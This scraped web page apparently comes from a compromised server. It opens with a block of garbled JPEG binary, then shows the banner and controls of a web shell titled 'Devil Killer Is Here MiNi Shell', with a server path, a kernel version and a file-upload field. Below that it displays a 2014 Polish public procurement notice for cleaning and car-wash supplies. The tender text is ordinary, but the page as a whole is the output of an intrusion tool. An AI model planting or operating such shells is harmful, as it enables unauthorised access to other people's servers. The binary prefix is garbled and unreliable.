JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140113/12442-N-2014.html

<p class="kh_header"><b>Warszawa: Sukcesywna dostawa środków czyszczących, wyrobów włókienniczych, papierów i ręczników papierowych oraz środków do pielęgnacji i mycia używanych w myjniach samochodowych w podziale na dwie części.</b><br>
<b>Numer ogłoszenia: 12442 - 2014; data zamieszczenia: 13.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Mazowiecka Instytucja Gospodarki Budźetowej Mazovia , ul. Antoniego Kocjana 3, 01-473 Warszawa, woj. mazowieckie, tel. 22 328 60 01, faks 22 328 60 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igbmazovia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa środków czyszczących, wyrobów włókienniczych, papierów i ręczników papierowych oraz środków do pielęgnacji i mycia używanych w myjniach samochodowych w podziale na dwie części..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa środków czyszczących, wyrobów włókienniczych, papierów i ręczników papierowych oraz środków do pielęgnacji i mycia używanych w myjniach samochodowych w podziale na dwie części: 
Część I Sukcesywna dostawa środków czyszczących, wyrobów włókienniczych, papierów i ręczników papierowych wg ilości i asortymentu określonego w Załączniku Nr 1A do SIWZ.
Część II Sukcesywna dostawa środków do pielęgnacji i mycia używanych w myjniach samochodowych, wg ilości i asortymentu określonego w Załączniku Nr 1B do SIWZ.
Szczegółowy opis przedmiotu zamówienia określają Formularze cenowe: Załącznik Nr 1A dla części I oraz Załącznik Nr 1B dla części II.
Zamawiający w odniesieniu do wszystkich części zamówienia zastrzega sobie prawo:
-rezygnacji z zakupu części produktów wynikającym z braku lub ograniczenia zapotrzebowania,
-zamiany ilości zamawianych produktów w ramach wartości i asortymentu określonego w umowie, w przypadku zmiany potrzeb Zamawiającego,
-zmiany asortymentu do 5 % wartości umowy, pod warunkiem, że nie spowoduje to zwiększenia wartości całego zamówienia określonej w umowie. Cena takich produktów nie może być wyższa niż cena producenta maksymalnie z 2% marżą. Zamówienie nastąpi po otrzymaniu wyceny od Wykonawcy i po akceptacji ceny przez Zamawiającego,
-zmiany asortymentu w przypadku wycofania starego i wprowadzenia nowego produktu/ produktów, w ramach zaoferowanej grupy asortymentowej o tej samej lub wyższej jakości i parametrach, w cenie nie wyższej niż zaoferowana w ofercie przetargowej.
Część I SUKCESYWNA DOSTAWA ŚRODKÓW CZYSZCZĄCYCH, WYROBÓW WŁÓKIENNICZYCH, PAPIERÓW I RĘCZNIKÓW PAPIEROWYCH.
1.Przedmiotem zamówienia jest zakup i sukcesywna dostawa środków czyszczących, wyrobów włókienniczych, mydła, detergentów, preparatów myjących i piorących, rękawic gumowych i jednorazowych, środków higieny osobistej, papierów i ręczników papierowych oraz produktów z tworzyw sztucznych używanych w gospodarstwie domowym. 
2.W treści formularza ofertowego (kolumna trzecia) wykonawca zobowiązany jest podać nazwę oferowanego towaru oraz producenta. Brak podania parametrów oferowanego sprzętu spowoduje odrzucenie oferty na podstawie ar 7. 89 ust. 1 pkt 2 Pzp.
3.Miejscem dostarczenia środków chemicznych jest Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA przy ul. Kocjana 3 w Warszawie, Stołówka Pracownicza Mazowieckiej Instytucji Gospodarki Budżetowej MAZOVIA ul. Rakowiecka 37A w Warszawie, Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA Oddział w Warszawie Mokotowie ul. Rakowiecka 37A w Warszawie, Bufet Politechnika Warszawska ul. Narbutta 85 w Warszawie  
4.W przypadku zaoferowania produktu/produktów równoważnych zamawiający żąda załączenia do oferty nieodpłatnych próbek oraz udowodnienia, że określony produkt/produkty są równoważne. Zamawiający zastrzega sobie możliwość zlecenia na koszt Wykonawcy badań zaoferowanych produktów równoważnych w jednostce badawczej posiadającej uprawnienia do przeprowadzenia stosownych badań, w przypadku istotnych wątpliwości, co do ich równoważności, w szczególności dotyczących: nieprzyjemnego i żrącego zapach powodującego np. łzawienie oczu jak również podrażnienie spojówek podczas wykorzystania preparatu, produktu.
5.Szczegółowy formularz cenowy środków czystościowych przedmiotu zamówienia stanowi Załącznik Nr 1A do opisu przedmiotu zamówienia.
6.Środki chemiczne używane w do wykonania podmiotu umowy będą posiadały wymagane atesty, zezwalające na stosowanie ich w Polsce.
7.Wykonawca, najpóźniej w dniu podpisania umowy, zobowiązany będzie do dostarczenia kart charakterystyki substancji niebezpiecznych środków czystości, które takich kart wymagają.
8.Zamawiający zastrzega sobie, że ilości środków chemicznych wskazanych w Formularzu cenowym są ilościami szacunkowymi, służącymi jedynie do skalkulowania ceny oferty, porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy, z którym zamawiający podpisze umowę nie przysługuje roszczenie o realizacje dostawy w wielkościach podanych w Formularzu oferty. Zakupy dokonane w trakcie realizacji umowy mogę różnić się ilościowo od tych podanych w Formularzu cenowym, jednak łączna wartość zakupów nie przekroczy całkowitej wartości zamówienia.
9.Jeśli w trakcie realizacji umowy wystąpi konieczność zakupu środków chemicznych niewymienionych w Formularzu cenowym, a które są niezbędne do funkcjonowania Zamawiającego, będą one zamówione u Wykonawcy w ramach zawartej umowy. Ceny tych środków nie mogą być wyższe niż ceny producentów maksymalnie z 2 % procentową marżą. Zamówienie nastąpi po otrzymaniu wyceny od Wykonawcy i po akceptacji ceny przez Zamawiającego. Zamawiający zastrzega, że łączna wartość dostaw w trakcie realizacji umowy nie przekroczy ceny oferty wybranego wykonawcy. 
10. Określenia przedmiotu zamówienia ze Wspólnym słownikiem zamówień:
39800000-0 - środki czyszczące i polerujące;
39224000-8 - miotły i szczotki i inne artykuły różnego rodzaju;
39224320-7 - gąbki;
39224320-7 - mydła;
24950000-8 - specjalistyczne produkty chemiczne;
39831200-8 - detergenty;
39811100-1 - odświeżacze powietrza;
39812000-7 - pasty i kremy;
39510000-0 - wyroby włókiennicze używane w gospodarstwie domowym;
33763000-6- ręczniki papierowe;
33761000-2- papiery toaletowe;
Część II 	SUKCESYWNA DOSTAWA ŚRODKÓW DO PIELĘGNACJI I MYCIA UŻYWANYCH W MYJNIACH SAMOCHODOWYCH
1.Przedmiotem zamówienia jest zakup i sukcesywna dostawa środków do pielęgnacji i mycia używanych w myjniach samochodowych.
2.W treści formularza ofertowego (kolumna trzecia) wykonawca zobowiązany jest podać nazwę oferowanego towaru oraz producenta. Brak podania parametrów oferowanego sprzętu spowoduje odrzucenie oferty na podstawie ar 7. 89 ust. 1 pkt 2 Pzp.
3.Miejscem dostarczenia środków do pielęgnacji i mycia używane w myjniach samochodowych jest Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA przy ul. Kocjana 3 w Warszawie, Mazowiecka Instytucja Gospodarki Budżetowej MAZOVIA Oddział w Warszawie Mokotowie ul. Rakowiecka 37A w Warszawie.  
4.W przypadku zaoferowania produktu/produktów równoważnych zamawiający żąda załączenia do oferty nieodpłatnych próbek oraz udowodnienia że określony produkt/produkty są równoważne. Zamawiający zastrzega sobie możliwość zlecenia na koszt Wykonawcy badań zaoferowanych produktów równoważnych w jednostce badawczej posiadającej uprawnienia do przeprowadzenia stosownych badań, w przypadku istotnych wątpliwości co do ich równoważności, w szczególności dotyczących: nieprzyjemnego i żrącego zapach powodującego np. łzawienie oczu jak również podrażnienie spojówek podczas wykorzystania preparatu/produktu.
5.Szczegółowy przedmiot zamówienia zawiera formularz cenowy stanowiący Załącznik Nr 1B do opisu przedmiotu zamówienia.
6.Środki chemiczne używane do wykonania przedmiotu umowy będą posiadały wymagane atesty, zezwalające na stosowanie ich w Polsce.
7.Wykonawca, najpóźniej w dniu podpisania umowy, zobowiązany będzie do dostarczenia kart charakterystyki substancji niebezpiecznych środków czystości, które takich kart wymagają.
8.Podane w Załączniku Nr 1B  ilości stanowią szacunkowe zapotrzebowanie. Zamawiający zastrzega sobie prawo:
-rezygnacji z zakupu części produktów wynikającym z braku lub ograniczenia zapotrzebowania;
-zamiany ilości zamawianych produktów w ramach wartości i asortymentu określonego w umowie, w przypadku zmiany potrzeb Zamawiającego.
Wykonawcy, z którym zamawiający podpisze umowę nie przysługuje roszczenie o realizacje dostawy w wielkościach podanych w Formularzu oferty.
2. Określenia przedmiotu zamówienia ze Wspólnym słownikiem zamówień:
39800000-0 - środki czyszczące i polerujące
39831500-1 - samochodowe środki czyszczące;
39224320-7 - gąbki;
24950000-8 - specjalistyczne produkty chemiczne;
39831200-8 - detergenty.
33763000-6 - ręczniki papierowe , 
39510000-0 wyroby włókiennicze
3.Zamawiający nie przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 7 Pzp.
4.Zamawiający nie przewiduje składania ofert wariantowych.
5.Zamawiający dopuszcza składanie ofert częściowych, odrębnie na każdą część.
6.Podwykonawstwo
1)Zamawiający zgodnie z art. 36a ust. 1 Pzp informuje, że wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Brak wskazania podwykonawcy oznacza, że Wykonawca samodzielnie zrealizuje zamówienie.
Za czynności podwykonawców Wykonawca odpowiada wobec Zamawiającego jak za działania własne,
2)Jeżeli Wykonawca samodzielnie spełnia warunki, o których mowa w art. 22 ust. 1 Pzp, a zamierza powierzyć części zamówienia podwykonawcom, Wykonawca zobowiązany jest w Formularzu ofertowym (Załącznik Nr 1) wskazać części zamówienia, które zamierza powierzyć podwykonawcom.
3)Jeżeli Wykonawca wykazuje spełnienie warunków, o których mowa w art. 22 ust. 1 Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b Pzp (zgodnie z rozdziałem VI ust. 1 pkt 3) - 4) SIWZ), a podmioty te będą brały udział w realizacji części zamówienia, to Wykonawca w odniesieniu do tych podmiotów zobowiązany jest w Formularzu ofertowym (Załącznik Nr 1) wykazać te podmioty oraz części zamówienia, które będą im powierzone i złożyć dokumenty o których mowa w  rozdziale VI ust. 2 pkt 1) - 6) SIWZ, dotyczące tych podmiotów.
7.Zamawiający dopuszcza możliwość składania ofert równoważnych o parametrach nie gorszych niż podane w opisie Przedmiotu Zamówienia - podstawa prawna: art. 29 ust. 3 Pzp. 
Wskazane przez Zamawiającego znaki towarowe, marki lub nazwy handlowe służą jedynie określeniu klasy produktu stanowiącego przedmiot zamówienia oraz ustaleniu standardu, a nie wskazują na konkretny produkt lub konkretnego producenta. Oryginalne nazewnictwo lub symbolika podana została w celu prawidłowego określenia przedmiotu zamówienia. Wzorcowy model stanowi przykładowy produkt spełniający wymogi Zamawiającego. 
W przypadku złożenia oferty równoważnej wymaga się, aby produkt równoważny posiadał identyczne lub lepsze parametry (właściwości), skład chemiczny, jak produkty wskazane przez Zamawiającego w opisie przedmiotu zamówienia. Ciężar udowodnienia równoważności spoczywa na Wykonawcy, co oznacza, że Wykonawca zobowiązany jest przedstawić wraz z ofertą jego szczegółową specyfikację, z której w sposób nie budzący żadnej wątpliwości winno wynikać, iż oferowany przedmiot zamówienia jest o takich samych lub lepszych parametrach, jakościowych oraz użytkowych w odniesieniu do przedmiotu zamówienia określonego przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 39.22.40.00-8, 39.22.43.20-7, 24.95.00.00-8, 39.83.12.00-8, 39.81.11.00-1, 39.81.20.00-7, 39.51.00.00-0, 33.76.30.00-6, 33.76.10.00-2, 39.83.15.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 
Dla Części I- 5 000,00 PLN
Dla Części II-  500,00 PLN
2.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu 
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym ze poręczenie kasy jest zawsze poręczeniem pieniężnym
2)gwarancjach bankowych;
3)gwarancjach ubezpieczeniowych;
4)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.Wadium wnoszone w pieniądze należy wpłacić przelewem na rachunek bankowy zamawiającego Bank PKO BP S.A. Nr rachunku 33 1020 1185 0000 4102 0019 1593.
4.Za datę wniesienia wadium w pieniądzu uważa się datę wpływu pieniędzy na konto zamawiającego. Na poleceniu przelewu należy zamieścić adnotację: dotyczy przetargu - numer sprawy 2.01.2014.D. Potwierdzenie przelewu (kopię) należy załączyć do oferty.
5.Potwierdzeniem wniesienia wadium w poręczeniach bankowych, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty określone w ust. 2 pkt 4 jest oryginalny dokument banku, ubezpieczyciela lub poręczyciela wystawiony na Mazowiecką Instytucję Gospodarki Budżetowej MAZOVIA; ul. Kocjana 3; 01-473 Warszawa i złożone w pokoju nr 6 w siedzibie zamawiającego, w dni robocze, od poniedziałku do piątku w godz. od 8.00 -16.00, tel. 0 22 328 60 76 Poświadczona kopia za zgodność z oryginałem winna być dołączona do oferty.
6.Zwrot wadium; zatrzymanie wadium
1)Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Pzp,
2)Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano,
3)Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
4)Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego,
5)Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
6)Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
7)Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)nie wniósł wymaganego zabezpieczenia wykonania umowy;
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania niezbędnej wiedzy i doświadczenia, tj. w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw środków czystości i artykułów chemii gospodarczej dla części I przedmiotu zamówienia oraz środków do pielęgnacji i mycia używanych w myjniach samochodowych dla części II przedmiotu zamówienia. 
Wykonawca spełni warunek, jeżeli wykaże się realizacją co najmniej:
dla Część I - trzech dostaw środków czystości i artykułów chemii gospodarczej, na kwotę nie mniejszą niż 200 000,00 zł brutto każda,
dla Część II  - dwóch dostaw środków do pielęgnacji i mycia używanych w myjniach samochodowych, na kwotę nie mniejszą niż 15 000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia, wzór Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia, wzór Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4)	Sytuacji ekonomicznej i finansowej, tj.: posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż: a) dla części I - 200 000,00 zł, b) dla części II - 15 000,00 zł. Jeżeli wykonawca składa ofertę na obydwie części przedmiotu zamówienia, polisa lub inny dokument powinna obejmować sumę gwarancyjną na kwotę stanowiącą sumę ww. kwot dla tych części.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
